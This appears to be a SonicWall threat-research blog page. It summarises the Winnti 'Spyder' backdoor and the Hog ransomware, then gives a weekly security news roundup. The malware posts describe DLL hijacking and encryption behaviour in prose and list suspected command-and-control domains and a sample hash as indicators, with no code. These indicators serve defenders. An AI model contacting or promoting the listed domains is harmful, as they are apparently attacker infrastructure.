March 26, 2021/in Threat intelligence /by Security News

Overview:

SonicWall’s Capture Labs Threat Research Team, recently captured and evaluated a new malicious sample termed Spyder, from China’s “Winnti” hacking group. This backdoor is written in C++ and designed to run on 64-bit Windows. This module is being used for targeted attacks on information storage systems, collecting information about corrupted devices, executing mischievous payloads, coordinating script execution, and C&C server communication. The module is loaded by the MSDTC system service using a well-known DLL Hijacking method. The function names within the modules export table are related to the exported functions of the apphelp.dll system library.

Static Information & Error Checking Information:

Dynamic Information:

Dll Main inside x64 debug:

Encrypted PE File in memory:

Call to Shellcode see RAX:

Dll Main inside Encrypted PE File:

Network Artifacts:

Get Request:

Possible domains in the wild:

sidc.everywebsite.us
snoc.hostingupdate.club
wntc.livehost.live
hccadkml89.dnslookup.services
koran.junlper.com
nted.tg9f6zwkx.icu
sidcfpprx14.in.ril.com
sidcfpprx01.in.ril.com
sidcfpprx25.in.ril.com
sidcfpprx10.in.ril.com

Supported Systems:

Windows 10
Windows 8.1
Windows 8.0
Windows 7
Windows Vista

SonicWall, (GAV) Gateway Anti-Virus, provides protection against this threat:

GAV: Spyder.DN (Trojan)

Appendix:

Sample SHA-1 Hash: 41777d592dd91e7fb2a1561aff018c452eb32c28

Hog ransomware decrypts victims who join their Discord server spreading in the wild

March 26, 2021/in Threat intelligence /by Security News

The SonicWall Capture Labs Threat Research team observed reports of a new variant family of Hog ransomware actively spreading in the wild.

The Hog ransomware encrypts the victim’s files with a strong encryption algorithm and only decrypts them if they join the developer’s Discord server.

Infection Cycle:

The ransomware adds the following files to the system:

Malware.exe
- %App.path%\ [Filename]. Hog

Once the computer is compromised, the ransomware runs the following commands:

When Hog is started it will create and assign a unique ID number to the victim then scan all local drives for data files to encrypt.

When encrypting files it will use the AES encryption algorithm and encrypt all files except following extensions:

.exe .dll .ini .scr .sys .vmx .vmdk

The ransomware encrypts all the files and appends the [.Hog] extension onto each encrypted file’s filename.

If the victim has joined the Discord server the ransomware will decrypt the victims’ files using a static key embedded in the ransomware.

After encrypting all personal documents, the ransomware shows the following page containing a message reporting that the computer has been encrypted and how to unlock the files.

SonicWall Capture Labs provides protection against this threat via the following signature:

GAV: HogRansom.RSM (Trojan)

This threat is also detected by SonicWall Capture ATP w/RTDMI and the Capture Client endpoint solutions.

Cybersecurity News & Trends – 03-19-21

March 19, 2021/0 Comments/in Weekly News /by Amber Wolff

This week, SonicWall released its biggest trove of threat intelligence yet: The 2021 SonicWall Cyber Threat Report.

SonicWall in the News

Microsoft Office Files Now Used By Hackers to Spread Malware: IoT Under Attack — Tech Times

Tech Times covered SonicWall’s 2021 Cyber Threat Report, highlighting the surge in malicious Office file attacks.

Election security report calls out Russian, Iranian influence ops. Remediation progress. Ukraine finds Russian cyberespionage — CyberWire

SonicWall’s 2021 Cyber Threat Report was included under the “Cyber Trends” section of the newsletter.

Threat Actors Thriving on the Fear and Uncertainty of Remote Workforces — Help Net Security

Help Net Security shared an article on SonicWall’s 2021 Threat Report, highlighting that cyber criminals preyed on the new remote work reality.

Ransomware Up 62 Percent Since 2019 — BetaNews

BetaNews shared an article on SonicWall’s 2021 Threat Report, highlighting the growth in ransomware.

New SonicWall 2020 Research Shows Cyber Arms Race At Tipping Point — CRN

This article features the findings from SonicWall’s 2021 Cyber Threat Report.

SonicWall: Pandemic exposes record-breaking cyber attacks — Mobile News

This article features the findings from SonicWall’s 2021 Cyber Threat Report.

Ransomware and IoT Malware Detections Surge By Over 60% — InfoSecurity Magazine

InfoSecurity Magazine covered SonicWall’s 2021 Cyber Threat Report, highlighting the double-digit surge in ransomware and IoT malware.

Cybercrime Saw an ‘Explosion’ in 2020 — ITProPortal

ITProPortal covered SonicWall’s 2021 Cyber Threat Report, highlighting that ransomware, cryptojacking and malicious Office files were the most popular vectors for cybercrime in 2020.

ChannelPro Weekly Podcast: Episode #178 — ChannelPro Weekly Podcast

This podcast features an interview with Dmitriy discussing the impact the pandemic had on cybersecurity and the cybersecurity trends of 2021.

Industry News

More than $4 billion in cybercrime losses reported to FBI in 2020 — FBI Internet Crime Report 2021

American victims reported $4.2 billion in losses as a result of cybercrime and internet fraud to the FBI in 2020, a roughly 20% uptick from 2019.

Attackers are trying awfully hard to backdoor iOS developers’ Macs — Ars Technica

Researchers said they’ve found a trojanized code library in the wild that attempts to install advanced surveillance malware on the Macs of iOS software developers.

Ransom Payments Have Nearly Tripled — Dark Reading

In 2020, ransomware targeted the manufacturing sector, healthcare organizations and construction companies, with the average ransom reaching $312,000, a report finds.

U.S. taxpayers targeted with RAT malware in ongoing phishing attacks — Bleeping Computer

U.S. taxpayers are being targeted by phishing attacks attempting to take over their computers using malware and steal sensitive personal and financial information.

$4,000 COVID-19 ‘Relief Checks’ Cloak Dridex Malware — Threat Post

The American Rescue Act is the latest zeitgeisty lure being circulated in an email campaign.

Mimecast Says SolarWinds Hackers Stole Source Code — SecurityWeek

Email security company Mimecast on Tuesday said it completed its forensic investigation into the impact of the SolarWinds supply chain attack and revealed that the threat actor managed to steal some source code.

Buffalo Public Schools cancels classes after cyberattack — Cyberscoop

Ransomware attackers appear to have taken a swipe at Buffalo Public Schools in recent days, screeching the school system’s plans for remote classes and in-person learning to a halt on Friday.

FBI warns of escalating Pysa ransomware attacks on education orgs — Bleeping Computer

The Federal Bureau of Investigation (FBI) Cyber Division has warned system administrators and cybersecurity professionals of increased Pysa ransomware activity targeting educational institutions.

Bitcoin surges past $60,000 for first time — BBC

Bitcoin, which has more than tripled in value since the end of last year, has been powered on by well-known companies adopting it as a method of payment.

Exclusive: Microsoft could reap more than $150 million in new U.S. cyber spending, upsetting some lawmakers — Reuters

Microsoft stands to receive nearly a quarter of COVID-19 relief funds destined for U.S. cybersecurity defenders, angering some lawmakers who don’t want to increase funding for a company whose software was recently at the heart of two big hacks.

Molson Coors says cyberattack disrupted beer brewing — Cyberscoop

Molson Coors, one of the biggest beer companies in the U.S., didn’t provide many specifics about the cyberattack.

With Spectre Still Lurking, Google Looks to Protect the Web — Wired

Researchers from Google have developed a proof-of-concept that reveals the hazard Spectre assaults pose to the browser.

Ransomware now attacks Microsoft Exchange servers with ProxyLogon exploits — Bleeping Computer

A new ransomware called ‘DEARCRY’ is targeting Microsoft Exchange servers, with one victim stating they were infected via the ProxyLogon vulnerabilities.

In Case You Missed It

Tipping Point: SonicWall Exposes Soaring Threat Levels, Historic Power Shifts In New Report — Geoff Blaine
Hafnium Uses Zero-Day Vulnerabilities Against Microsoft Exchange: What to Do Next — SonicWall Staff
SonicWall NSa 2700 vs. Fortinet FortiGate 100F — Kayvon Sadeghi
SonicWall Portfolio Racks Up 10 Industry-recognized Awards — Lindsey Lockhart
SonicWall Sweeps Six Industry Awards, Including Grand Trophy, at Network Product Guide 2020 IT World Awards — Brook Chelmo

Posts

Microsoft Security Bulletin Coverage for April 2021

SSRF, vRealize Operations Manager API

Uniwinnicrypt ransomware charges over $550k for file recovery

Cybersecurity News & Trends – 04-09-21

SonicWall in the News

Industry News

In Case You Missed It

March 2021 OpenSSL Vulnerability

Cybersecurity News & Trends – 04-02-21

SonicWall in the News

Industry News

In Case You Missed It

Cybersecurity News & Trends – 03-26-21

SonicWall in the News

Industry News

In Case You Missed It

China’s “Winnti” Spyder Module

Hog ransomware decrypts victims who join their Discord server spreading in the wild

Cybersecurity News & Trends – 03-19-21

SonicWall in the News

Industry News

In Case You Missed It

About SonicWall

Products

Solutions

Customers

Support

Posts

SonicWall in the News

Industry News

In Case You Missed It

SonicWall in the News

Industry News

In Case You Missed It

SonicWall in the News

Industry News

In Case You Missed It

SonicWall in the News

Industry News

In Case You Missed It

About SonicWall

Products

Solutions

Customers

Support

Pin It on Pinterest